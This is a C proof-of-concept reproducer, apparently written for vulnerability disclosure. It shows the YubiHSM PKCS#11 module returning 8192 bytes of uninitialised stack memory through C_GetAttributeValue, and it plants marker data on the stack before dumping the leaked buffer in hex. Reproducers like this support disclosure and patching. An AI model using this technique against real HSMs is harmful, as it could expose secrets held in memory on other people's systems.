// SPDX-FileCopyrightText: 2023 Heiko Schaefer <heiko@schaefer.name>
// SPDX-FileCopyrightText: 2023 Christian Reitter <copyright@inhq.net>
// SPDX-License-Identifier: CC0

// Demonstrates that C_GetAttributeValue for CKA_SERIAL_NUMBER returns
// 8192 bytes of memory (CKA_ISSUER and CKA_SUBJECT show the same behavior).

// How to run:

// (NOTE: For simplicity, this program expects exactly one object of class
// CKO_CERTIFICATE on the HSM)

// === Setting up and using a YubiHSM for this reproducer ===

// (NOTE: these instructions include a factory reset which deletes all data
//  from the YubiHSM.
//  You probably don't want to do this on a production device!)

// - Factory reset (then wait for the device to boot up)

// - Generate X.509 cert, (e.g. "yubico-internal-https-ca-crt.pem" as shown in
//   https://developers.yubico.com/PIV/Guides/Certificate_authority.html
//   in the "Creating a Root CA" section.
//   Ensure datefudge is installed, e.g. via your OS distribution sources.)

// - Convert cert to DER format:
//   "openssl x509 -in yubico-internal-https-ca-crt.pem -out yubico-internal-https-ca-crt.der -outform DER"

// - Upload cert to YubiHSM (using the yubihsm-shell tool):
//   "yubihsm-shell --connector=yhusb:// -p password -a put-opaque --algorithm=opaque-x509-certificate --in yubico-internal-https-ca-crt.der"

// - Set environment variable YUBIHSM_PKCS11_CONF,
//   see https://developers.yubico.com/yubihsm-shell/yubihsm-pkcs11.html
//   (without this configuration, the C_Initialize call fails with error 7):
//   "export YUBIHSM_PKCS11_CONF=<filename>"
//
// - The configuration file must contain at least a connector setting, e.g.:
//   "connector=yhusb://"
//   (Alteratively, you can run the yubihsm-connector daemon, and configure
//    its connector URL here)

// - Compile the program (make sure that the MODULE points to the correct path for yubihsm_pkcs11.so)
//   e.g.: "gcc pkcs11-memleak.c -o pkcs11-memleak"

// - Run: "./pkcs11-memleak"
//   The output contains the 8192 byte return value (in hex representation)


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <dlfcn.h>
#include <assert.h>
#include <pkcs11/pkcs11.h>

#define MODULE "/usr/lib64/pkcs11/yubihsm_pkcs11.so"

// Alternate yubihsm_pkcs11.so, with "memset(tmp, 0x41, sizeof(tmp));"
// added in line 5070, after "CK_BYTE tmp[8192];"
//
//#define MODULE "yubihsm-shell/build/pkcs11/yubihsm_pkcs11.so"


void __attribute__((optimize("O0"))) put_dummy_secrets_on_stack() {
  uint8_t secret_stack_data[10000] = { 0 };

  uint8_t message_fragment[] = "BBBBBB leaked secret data from program stack BBBBBB";
  size_t raw_size = sizeof(message_fragment) - 1;
  for (size_t offset = 0; offset + raw_size < sizeof(secret_stack_data); offset += raw_size) {
    memcpy(secret_stack_data + offset, message_fragment, raw_size);
  }

  printf("pushed dummy secrets onto the stack \n");
}

int main() {
  CK_RV rv;
  CK_FUNCTION_LIST *funcs;

  // C_GetFunctionList
  CK_RV (*pFunc)();
  void *d;
 
  printf("Getting the PKCS11 function list...\n");
 
  d = dlopen(MODULE, RTLD_NOW);
  if (d == NULL) {
    printf("yubihsm_pkcs11.so not found\n");
    return -1;
  }
 
  pFunc = (CK_RV (*)())dlsym(d, "C_GetFunctionList");
  if (pFunc == NULL) {
    printf("C_GetFunctionList() not found in yubihsm_pkcs11.so\n");
    return -1;
  }
  rv = pFunc(&funcs);
  assert(rv == CKR_OK);


  // C_Initialize
  CK_C_INITIALIZE_ARGS  cinit_args;
  
  memset(&cinit_args, 0x0, sizeof(cinit_args));
  cinit_args.flags = CKF_OS_LOCKING_OK;

  printf("Initializing the PKCS11 environment...\n");
  rv = funcs->C_Initialize(&cinit_args);
  assert(rv == CKR_OK);


  // C_OpenSession
  CK_SLOT_ID slot_id;
  CK_FLAGS flags;
  CK_SESSION_HANDLE session;

  slot_id = 0;
  flags = CKF_SERIAL_SESSION | CKF_RW_SESSION;
  printf("Opening a session... \n");
  rv = funcs->C_OpenSession(slot_id, flags, (CK_VOID_PTR) NULL, NULL, &session);
  assert(rv == CKR_OK);


  // C_Login
  char password[] = "0001password";
  printf("Logging in... \n");
  rv = funcs->C_Login(session, CKU_USER, (CK_UTF8CHAR_PTR) password,
                (CK_ULONG) strlen(password));
  assert(rv == CKR_OK);


  // C_FindObjects
  #define MAX_OBJECT_COUNT 5 // arbitrary value

  CK_OBJECT_HANDLE hObjects[MAX_OBJECT_COUNT];
  CK_ULONG ulObjectCount;

  CK_OBJECT_CLASS class = CKO_CERTIFICATE;

  CK_ATTRIBUTE keyAttrs[] = {
    { CKA_CLASS, &class, sizeof(class) },
  };

  CK_ULONG template_size;
  template_size = sizeof(keyAttrs) / sizeof(CK_ATTRIBUTE);

  printf("Searching object... \n");
  rv = funcs->C_FindObjectsInit(session, keyAttrs, template_size);
  assert(rv == CKR_OK);

  // Find objects: we expect exactly one CKO_CERTIFICATE
  rv = funcs->C_FindObjects(session, hObjects, MAX_OBJECT_COUNT, &ulObjectCount);
  assert(rv == CKR_OK);
  assert(ulObjectCount == 1);

  rv = funcs->C_FindObjectsFinal(session);
  assert(rv == CKR_OK);

  // C_GetAttributeValue
  CK_ULONG ulSize;
  ulSize = 8192; // hardcoded expected size

  unsigned char * buf;
  buf = malloc(ulSize);

  CK_ATTRIBUTE dataTemplate[] = {
    {CKA_SERIAL_NUMBER, buf, ulSize}
  };

  // A prior operation that might leave secrets on the stack
  put_dummy_secrets_on_stack();

  printf("Getting CKA_SERIAL_NUMBER value... \n");
  rv = funcs->C_GetAttributeValue(session, hObjects[0], dataTemplate, 1);
  assert(rv == CKR_OK);

  for (CK_ULONG i = 0; i < ulSize; i++) {
    printf("%02X ", buf[i]);
    if (((i+1) % 16) == 0) {
      printf("\n");
    }
  }

  free(buf);

  // C_Finalize
  rv = funcs->C_Finalize(NULL);
  assert(rv == CKR_OK);

  printf("Completed successfully!\n");  
  return 0;
}

